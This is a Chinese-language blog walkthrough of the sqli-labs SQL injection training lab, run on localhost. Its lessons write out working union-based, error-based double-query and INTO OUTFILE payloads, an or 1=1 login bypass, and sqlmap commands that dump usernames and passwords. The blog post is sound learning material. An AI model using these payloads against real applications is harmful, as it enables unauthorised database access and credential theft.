

<!DOCTYPE html>
<html lang="en" color-mode=light>

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>sqlilabs  --持续更新 - tremiy</title>
  <meta name="apple-mobile-web-app-capable" content="yes" />
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta name="google" content="notranslate" />

  
  
  <meta name="description" content="sqli-labs    –持续更新SQL注入漏洞形成..."> 
  
  <meta name="author" content="tremiy"> 

  
    <link rel="icon" href="/images/icons/favicon-16x16.png" type="image/png" sizes="16x16">
  
  
    <link rel="icon" href="/images/icons/favicon-32x32.png" type="image/png" sizes="32x32">
  
  
    <link rel="apple-touch-icon" href="/images/icons/apple-touch-icon.png" sizes="180x180">
  
  
    <meta rel="mask-icon" href="/images/icons/stun-logo.svg" color="#333333">
  
  
    <meta rel="msapplication-TileImage" content="/images/icons/favicon-144x144.png">
    <meta rel="msapplication-TileColor" content="#000000">
  

  
<link rel="stylesheet" href="/css/style.css">


  
  
<link rel="stylesheet" href="//at.alicdn.com/t/font_1445822_onl0g0h21np.css">

  

  
  
  
<link rel="stylesheet" href="https://cdn.bootcss.com/fancybox/3.5.7/jquery.fancybox.min.css">

  

  
  
  
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/xcode.min.css">

  

  <script>
    var CONFIG = window.CONFIG || {};
    var ZHAOO = window.ZHAOO || {};
    CONFIG = {
      isHome: false,
      fancybox: true,
      pjax: false,
      lazyload: {
        enable: true,
        onlyPost: 'false',
        loading: '/images/theme/loading.gif'
      },
      donate: {
        enable: false,
        alipay: 'https://imgchr.com/i/BHcc6A',
        wechat: 'https://imgchr.com/i/BHctyR'
      },
      motto: {
        api: '',
        default: 'You can make it'
      },
      galleries: {
        enable: true
      },
      fab: {
        enable: true,
        alwaysShow: false
      },
      carrier: {
        enable: false
      },
      daovoice: {
        enable: true
      }
    }
  </script>

  

  
<meta name="generator" content="Hexo 5.2.0"></head>
<body class="lock-screen">
  <div class="loading"></div>
  


<nav class="navbar">
  <div class="left"></div>
  <div class="center">sqlilabs  --持续更新</div>
  <div class="right">
    
      <i class="iconfont iconmoono" id="color-toggle" color-toggle="light"></i>
    
    <i class="iconfont iconmenu j-navbar-menu"></i>
  </div>
</nav>

  <nav class="menu">
  <div class="menu-wrap">
    <div class="menu-close">
      <i class="iconfont iconbaseline-close-px"></i>
    </div>
    <ul class="menu-content">
      
      
      
      
      <li class="menu-item"><a href="/ " class="underline"> 首页</a></li>
      
      
      
      
      <li class="menu-item"><a href="/galleries " class="underline"> 课设</a></li>
      
      
      
      
      <li class="menu-item"><a href="/archives " class="underline"> 课外</a></li>
      
      
      
      
      <li class="menu-item"><a href="/tags " class="underline"> 工具</a></li>
      
      
      
      
      <li class="menu-item"><a href="/categories " class="underline"> 其他</a></li>
      
      
      
      
      <li class="menu-item"><a href="/about " class="underline"> 待定</a></li>
      
    </ul>
    <div class="menu-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
  </div>
</nav>
  <main id="main">
  <div class="container" id="container">
    <article class="article">
  <div class="wrap">
    <section class="head">
  <img   class="lazyload" data-original="/images/theme/post-image.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  draggable="false">
  <div class="head-mask">
    <h1 class="head-title">sqlilabs  --持续更新</h1>
    <div class="head-info">
      <span class="post-info-item"><i class="iconfont iconcalendar"></i>November 09, 2020</span
        class="post-info-item">
      
      <span class="post-info-item"><i class="iconfont iconfont-size"></i>6889</span>
    </div>
  </div>
</section>
    <section class="main">
      <section class="content">
        <h1 id="sqli-labs-–持续更新"><a href="#sqli-labs-–持续更新" class="headerlink" title="sqli-labs    –持续更新"></a>sqli-labs    –持续更新</h1><p>SQL注入漏洞形成的原因是用户输入的数据被SQL解释器执行<br>常见的SQL注入类型包括：数字型和字符型。（还有更详细的划分，但大体上就分为这两个）<br>下面开始以sqli-labs为例，一起学习SQL注入  </p>
<h2 id="GET基于报错的SQL注入发现"><a href="#GET基于报错的SQL注入发现" class="headerlink" title="GET基于报错的SQL注入发现"></a>GET基于报错的SQL注入发现</h2><h3 id="less-1"><a href="#less-1" class="headerlink" title="less-1:"></a>less-1:</h3><p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/1.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><br>题目提示：输入ID，于是构造如下url：  </p>
<p><code>?id=1</code></p>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/2.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><br>为了猜有几个id便慢慢试，到<code>id=15</code>没有回显，故一共有14个id<br>使用单引号注入，报错：<br><img   class="lazyload" data-original="/2020/11/09/sqlilabs/3.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><br>因为报错内容是<code>&#39;1&#39;&#39; LIMIT 0,1</code><br>所以猜测其SQL语句是：<br><code>seclet login_name,password from table where id = &#39;ID&#39; LIMIT 0,1</code><br>所以当我们输入<code>id=1&#39;</code>时1后面的引号会将SQL语句中ID的前一个引号闭合，让SQL语句变为<code>seclet login_name,password from table where id = &#39;1&#39;&#39; LIMIT 0,1</code> ，导致报错。<br>下一步就是利用<code>order by</code>爆出表中列的个数：  </p>
<p><code>?id=1&#39; order by 3 --+</code></p>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/4.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><br>当<code>order by</code>后面接4列的时候报错，因此可以推测出有3列。<br>下一步，使用<code>union select</code>查看回显的位置  </p>
<p><code>?id=0&#39; union select 1,2,3 --+</code></p>
<p><em>这里有个疑问：不知道为什么要选择一个不存在的id才能回显</em></p>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/5.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><br>发现第2、3列均有回显。<br>接下来需要用到如下函数：<br>（1）<code>version（）</code>：查看数据库版本<br>（2）<code>user（）</code>：查看当前用户<br>（3）<code>database（）</code>：查看使用的数据库<br>（4） <code>limit  </code>:limit子句来分批获取所有数据<br>（5）<code>group_concat（）</code>：一次性获取数据库信息。<br><br><br>有了这些函数就开始爆版本、用户、数据库：  </p>
<ol>
<li>查看数据库、版本、用户：<code>?id=0&#39; union select 1,2,group_concat(database(),&#39;,&#39;,version(),&#39;,&#39;,user()) --+</code></li>
</ol>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/6.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" >  </p>
<p>在这里，<code>database()</code>对我们是有用的，因为我们要进入这个数据库查看login_name和password  </p>
<ol start="2">
<li>接着查看表名：<code>?id=0&#39; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+</code><br><img   class="lazyload" data-original="/2020/11/09/sqlilabs/7.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" >   </li>
<li>再接着查看列名： <code>?id=0&#39;union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+</code><br><img   class="lazyload" data-original="/2020/11/09/sqlilabs/8.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" >  </li>
<li>最后爆破username和password  ：<code>?id=0&#39; union select 1,2,group_concat(username,password) from users --+</code><br><img   class="lazyload" data-original="/2020/11/09/sqlilabs/9.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></li>
</ol>
<h3 id="less-2"><a href="#less-2" class="headerlink" title="less-2:"></a>less-2:</h3><p>报错语句：<code>&#39;LIMIT 0,1     </code><br>由此猜测其SQL语句：<br><code>select * from table where id=ID LIMIT 0,1</code>  </p>
<h3 id="less-3"><a href="#less-3" class="headerlink" title="less-3:"></a>less-3:</h3><p>报错语句：<code>&#39;1&#39;&#39;) LIMIT 0,1  </code><br>由此猜测其SQL语句：<br><code>select * from table where id=(&#39;ID&#39;) LIMIT 0,1    </code></p>
<h3 id="less-4"><a href="#less-4" class="headerlink" title="less-4:"></a>less-4:</h3><p>注入单引号没反应，但注入双引号报错<br>报错语句：<code>&quot;1&quot;&quot;) LIMIT 0,1  </code><br>由此猜测其SQL语句：<br><code>select * from table where id=(&quot;ID&quot;) LIMIT 0,1</code></p>
<p><strong>剩下的步骤与less-1同</strong></p>
<p><em>_sqlmap使用指南：<code>https://www.zhihu.com/question/55542962/answer/1195551571</code>    _</em></p>
<p>这里我也以Less-1为例简单地使用sqlmap吧</p>
<p>kali自带sqlmap，我也是直接在kali上使用的sqlmap，在使用前先简单介绍一下会用到的一些命令（详细的命令上面给了链接了）</p>
<p><code>-u + 目标url</code></p>
<table>
<thead>
<tr>
<th>命令</th>
<th>作用</th>
</tr>
</thead>
<tbody><tr>
<td><code>--dbs</code></td>
<td>枚举数据库</td>
</tr>
<tr>
<td><code>--tables</code></td>
<td>枚举数据库的表</td>
</tr>
<tr>
<td><code>--columns</code></td>
<td>枚举表中的列</td>
</tr>
<tr>
<td><code>-D</code></td>
<td>指定数据库</td>
</tr>
<tr>
<td><code>-T</code></td>
<td>指定表</td>
</tr>
<tr>
<td><code>-C</code></td>
<td>指定列</td>
</tr>
</tbody></table>
<p>接下来开始使用sqlmap：</p>
<ol>
<li><code>sqlmap -u http路径/?id=1</code></li>
</ol>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/10.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<ol start="2">
<li><code>sqlmap -u http路径/?id=1 --dbs</code></li>
</ol>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/11.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<ol start="3">
<li><code>sqlmap -u http路径/?id=1 -D security --tables</code></li>
</ol>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/12.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<ol start="4">
<li><p><code>sqlmap -u http路径/?id=1 -D security -T users --columns</code></p>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/13.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
</li>
<li><p><code>sqlmap -u http路径/?id=1 -D security -T users -C username,password --dump</code></p>
</li>
</ol>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/14.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<h2 id="GET-基于双注入的SQL注入发现"><a href="#GET-基于双注入的SQL注入发现" class="headerlink" title="GET 基于双注入的SQL注入发现"></a>GET 基于双注入的SQL注入发现</h2><p><strong>有报错，但是没有回显位</strong></p>
<p>在做题之前，先来了解几个概念：</p>
<p><strong>SQL中常见的聚合函数：</strong></p>
<ol>
<li><p><code>count()</code>：记录个数/项目数/记录数等</p>
</li>
<li><p><code>avg()</code>：求某一列的平均数（若有Null会忽略其值，如果需要看成零，则用<code>IsNull()</code>来转换</p>
</li>
<li><p><code>sum()</code>：求和</p>
</li>
<li><p><code>max()</code>：求最大值</p>
</li>
<li><p><code>min()</code>：求最小值  </p>
<p>关于<code>group by</code>函数和聚合函数的理解可以看看这篇文章：<a target="_blank" rel="noopener" href="https://blog.csdn.net/shaofei63/article/details/42800793?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-1.control&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-1.control"></a></p>
</li>
</ol>
<p>双注入查询需要理解的几个函数：</p>
<ol>
<li><p><code>rand()</code>：随机函数</p>
</li>
<li><p><code>floor()</code>：取整函数</p>
</li>
<li><p><code>count()</code>：汇总函数</p>
</li>
<li><p><code>group by</code>：分组语句</p>
<p>双查询注入原理我觉得<a target="_blank" rel="noopener" href="https://www.cnblogs.com/laoxiajiadeyun/p/10283251.html">这篇</a>写的特别好了，但这篇文章评论区问到count()函数为什么是必要的，我不是太理解他的解释。我发现如果没有count()函数，那么返回的结果是这样的：<img   class="lazyload" data-original="/2020/11/09/sqlilabs/16.JPG" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>说明，在第三步将a语句的结果插入到虚拟表中时，即使主键冲突，它也会自动合并，而不会报错，即只有group by时，将a结果插入到虚拟表后会再对比合并。但有了count()函数后，当a在第二次查询时，要再次插入新的a语句结果时，已经为其分配了count值，那么这时合并就会发生错误，因为count本身就是记录不同的key值的，无法合并<img   class="lazyload" data-original="/2020/11/09/sqlilabs/17.JPG" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>以上都是本人的观点，不一定正确，因为没有百度到更具体的原因，在此仅作为个人学习记录。</p>
</li>
</ol>
<h3 id="less-5："><a href="#less-5：" class="headerlink" title="less-5："></a>less-5：</h3><p><em>注意：因为rand()的随机性，如果没有返回报错结果就多执行几次</em></p>
<ol>
<li>查询数据库：</li>
</ol>
<p><code>http://localhost/sqli-labs-master/Less-5/?id=1&#39; union select 1,count(*),concat((select database()),floor(rand()*2))as a from information_schema.tables group by a --+</code></p>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/15.JPG" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<ol start="2">
<li>查询表名</li>
</ol>
<p><code>http://localhost/sqli-labs-master/Less-5/?id=1&#39; union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand()*2))as a from information_schema.tables group by a --+</code></p>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/18.JPG" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>这里只能返回一列，因此通过改变<code>Limit 0,1</code>来遍历</p>
<p><code>limit</code>用法：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">select * from tableName limit i,n</span><br><span class="line"># tableName：表名</span><br><span class="line"># i：为查询结果的索引值(默认从0开始)，当i&#x3D;0时可省略i</span><br><span class="line"># n：为查询结果返回的数量</span><br><span class="line"># i与n之间使用英文逗号&quot;,&quot;隔开</span><br></pre></td></tr></table></figure>

<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/19.JPG" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<ol start="3">
<li>查询列名：</li>
</ol>
<p><code>http://localhost/sqli-labs-master/Less-5/?id=1&#39; union select 1,count(*),concat((select column_name from information_schema.columns where table_schema=database() limit 8,1),floor(rand()*2))as a from information_schema.tables group by a --+</code></p>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/20.JPG" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/21.JPG" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>得到username和password</p>
<ol start="4">
<li>最后一个个遍历username和password即可：</li>
</ol>
<p><code>http://localhost/sqli-labs-master/Less-5/?id=1&#39; union select 1,count(*),concat((select username from users limit 0,1),floor(rand()*2))as a from information_schema.tables group by a --+</code></p>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/22.JPG" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<h3 id="less-6"><a href="#less-6" class="headerlink" title="less-6:"></a>less-6:</h3><p>其他都和less-5一样，但less-6使用双引号闭合字符串</p>
<h2 id="Dump-into-outfile"><a href="#Dump-into-outfile" class="headerlink" title="Dump into outfile"></a>Dump into outfile</h2><h3 id="less-7："><a href="#less-7：" class="headerlink" title="less-7："></a>less-7：</h3><p>看标题就知道，在做题前需要了解一些函数</p>
<table>
<thead>
<tr>
<th>函数名</th>
<th>作用</th>
<th>用法</th>
</tr>
</thead>
<tbody><tr>
<td>into outfile()</td>
<td>写文件</td>
<td>A into outfile “绝对路径”</td>
</tr>
</tbody></table>
<p>在做实验前要先在<code>my.ini</code>文件中添加<code>secure_file_priv=&quot;&quot;</code>，目的是使得写入文件的路径无限制</p>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/29.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>接下来开始看Less-7：</p>
<ol>
<li><p>先猜出闭合字符串的方式：<code>http://localhost/sqli-labs-master/Less-7/?id=1&#39;)) --+</code></p>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/23.JPG" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
</li>
<li><p>题目提示使用outfile，结合union select 使用，查看数据库名，虽然报错但是仍然生成了一个ttttest.php文件，打开正是数据库名：<code>http://localhost/sqli-labs-master/Less-7/?id=0&#39;)) union select 1,2,database() into outfile &quot;D:\\phpStudy\\PHPTutorial\\WWW\\ttttest.php&quot; --+</code></p>
<p><em>不知道为什么路径要用”\\“，否则就不能生成文件</em></p>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/24.JPG" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/25.JPG" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
</li>
<li><p>查看表名：<code>http://localhost/sqli-labs-master/Less-7/?id=0&#39;)) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() into outfile &quot;D:\\phpStudy\\PHPTutorial\\WWW\\ttttest.php&quot; --+</code></p>
<p><em>注：生成的文件不能覆盖，所以要删除原来的文件再执行</em></p>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/26.JPG" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
</li>
<li><p>查看列名：<code>http://localhost/sqli-labs-master/Less-7/?id=0&#39;)) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() into outfile &quot;D:\\phpStudy\\PHPTutorial\\WWW\\ttttest.php&quot; --+</code></p>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/27.JPG" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
</li>
<li><p>爆用户名和密码：<code>http://localhost/sqli-labs-master/Less-7/?id=0&#39;)) union select 1,2,group_concat(username,password) from users into outfile &quot;D:\\phpStudy\\PHPTutorial\\WWW\\ttttest.php&quot; --+</code></p>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/28.JPG" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
</li>
</ol>
<h2 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h2><p><strong>不报错，但是输入出错就不显示<code>Please input the ID as parameter with numeric value </code>这句话，可以利用这一点进行盲注</strong></p>
<h3 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h3><h4 id="less-8"><a href="#less-8" class="headerlink" title="less-8"></a>less-8</h4><p>参考了一点网上的资料写了一个脚本</p>
<h3 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h3><h4 id="less-9"><a href="#less-9" class="headerlink" title="less-9"></a>less-9</h4><h2 id="POST"><a href="#POST" class="headerlink" title="POST"></a>POST</h2><h4 id="less11"><a href="#less11" class="headerlink" title="less11"></a>less11</h4><p>这个特别简单，利用<code>1=1</code>永远成立即可</p>
<p>原理与Less-1相同，先利用单引号闭合sql语句，再利用or 1=1语句，让句子永远成立，最后注释后面的语句即可</p>
<p><em>注意：– 后面是有空格的！</em></p>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/30.JPG" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/31.JPG" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<h4 id="less-12"><a href="#less-12" class="headerlink" title="less-12"></a>less-12</h4><p>题目首先提示了，是双引号报错</p>
<p>那么在username中输入双引号，结果报错：<code>&quot;1&quot;&quot;) and password=(&quot;&quot;) LIMIT 0,1</code>，说明要使用<code>&quot;)</code>闭合</p>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/32.JPG" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>成功√</p>
<h4 id="less-13"><a href="#less-13" class="headerlink" title="less-13"></a>less-13</h4><p>题目提示是双注入，我们可以联想到less-5，利用聚合函数和随机数进行报错</p>
<ol>
<li><p>找到注入点，输入<code>1&#39;</code>测试，发现返回：<code>&#39;1&#39;&#39;) and password=(&#39;&#39;) LIMIT 0,1</code>，于是我们知道是用<code>&#39;)</code>闭合</p>
</li>
<li><p>查询列数：</p>
<p>`1’) order by 1 – ``</p>
<p> ``1’) order by 2 – `</p>
<p>1’) order by 3 – `报错，所以可以确定列数是2（一开始想当然以为是3，所以没有做出来，以后还是要细心谨慎呀）</p>
</li>
<li><p>利用聚合函数查询数据库：</p>
<p><code>1&#39;) union select count(*),concat((select database()),floor(rand()*2))as a from information_schema.tables group by a #</code></p>
</li>
</ol>
<p><em>注：之前get方法用的注释是<code>--+</code>，实际上是<code>-- </code>（后面有空格），之所以用加号是因为url会进行编码，加号编码后就是空格，而空格编码是%20，但POST方法不是在url中输入，因此使用<code>#</code>或者<code>-- </code>，为了看得更清楚，接下来都用<code>#</code></em></p>
<p><img   class="lazyload" data-original="/2020/11/09/sqlilabs/33.JPG" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<ol start="4">
<li><p>查询表名：</p>
<p><code>1&#39;) union select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),floor(rand()*2))as a from information_schema.tables group by a #</code></p>
</li>
</ol>
<p><em>这里和less-5一样更改limit后面的第一个参数就可以得到全部的表名，就不一一列举了</em></p>
<ol start="5">
<li><p>查询列名：</p>
<p><code>1&#39;) union select count(*),concat((select column_name from information_schema.columns where table_schema=database() limit 1,1),floor(rand()*2))as a from information_schema.tables group by a #</code></p>
</li>
<li><p>查询用户名和密码：</p>
<p><code>1&#39;) union select count(*) ,concat((select username from users limit 0,1),floor(rand()*2))as a from information_schema.tables group by a#</code></p>
<p><code>1&#39;) union select count(*) ,concat((select password from users limit 0,1),floor(rand()*2))as a from information_schema.tables group by a#</code></p>
</li>
</ol>
<h4 id="less-14"><a href="#less-14" class="headerlink" title="less-14"></a>less-14</h4><p>与less-13相同，就是闭合方式不同：使用双引号测试，报错：</p>
<p><code>&quot;1&quot;&quot; and password=&quot;&quot; LIMIT 0,1</code></p>
<p>所以只要将less-13的闭合改为双引号，其他都一样，即可完成注入，这里就不再赘述。</p>
<h4 id="less-15"><a href="#less-15" class="headerlink" title="less-15"></a>less-15</h4>
      </section>
      <section class="extra">
        
        
        
        
<nav class="nav">
  
    <a href="/2020/11/18/mysql%E5%9F%BA%E7%A1%80%E5%91%BD%E4%BB%A4%E4%BD%BF%E7%94%A8/"><i class="iconfont iconleft"></i>mysql基础命令使用</a>
  
  
    <a href="/2020/11/05/web%E6%96%B0%E6%89%8B/">攻防世界 web新手区<i class="iconfont iconright"></i></a>
  
</nav>

      </section>
      
      <section class="comments">
  
  <div class="btn" id="comments-btn">查看评论</div>
  
  
</section>
      
    </section>
  </div>
</article>
  </div>
</main>
  <footer class="footer">
  <div class="footer-social">
    
    
    
    
    
    <a href="tencent://message/?Menu=yes&uin=562602692 " target="_blank" onMouseOver="this.style.color= '#12B7F5'"
      onMouseOut="this.style.color='#38506c'">
      <i class="iconfont footer-social-item  iconQQ "></i>
    </a>
    
    
    
    
    
    <a href="javascript:; " target="_blank" onMouseOver="this.style.color= '#09BB07'"
      onMouseOut="this.style.color='#38506c'">
      <i class="iconfont footer-social-item  iconwechat-fill "></i>
    </a>
    
    
    
    
    
    <a href="https://www.instagram.com/izhaoo/ " target="_blank" onMouseOver="this.style.color= '#DA2E76'"
      onMouseOut="this.style.color='#38506c'">
      <i class="iconfont footer-social-item  iconinstagram "></i>
    </a>
    
    
    
    
    
    <a href="https://github.com/tremiy " target="_blank" onMouseOver="this.style.color= '#24292E'"
      onMouseOut="this.style.color='#38506c'">
      <i class="iconfont footer-social-item  icongithub-fill "></i>
    </a>
    
    
    
    
    
    <a href="MinLv_Y@163.com " target="_blank" onMouseOver="this.style.color='#38506c'"
      onMouseOut="this.style.color='#38506c'">
      <i class="iconfont footer-social-item  iconmail"></i>
    </a>
    
  </div>
  <div class="footer-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
</footer>
  
      <div class="fab fab-plus">
    <i class="iconfont iconplus"></i>
  </div>
  
  <div class="fab fab-daovoice">
    <i class="iconfont iconcomment"></i>
  </div>
  
  <div class="fab fab-up">
    <i class="iconfont iconcaret-up"></i>
  </div>
  
  
    
<script src="/js/color-mode.js"></script>

  
</body>


<script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.min.js"></script>






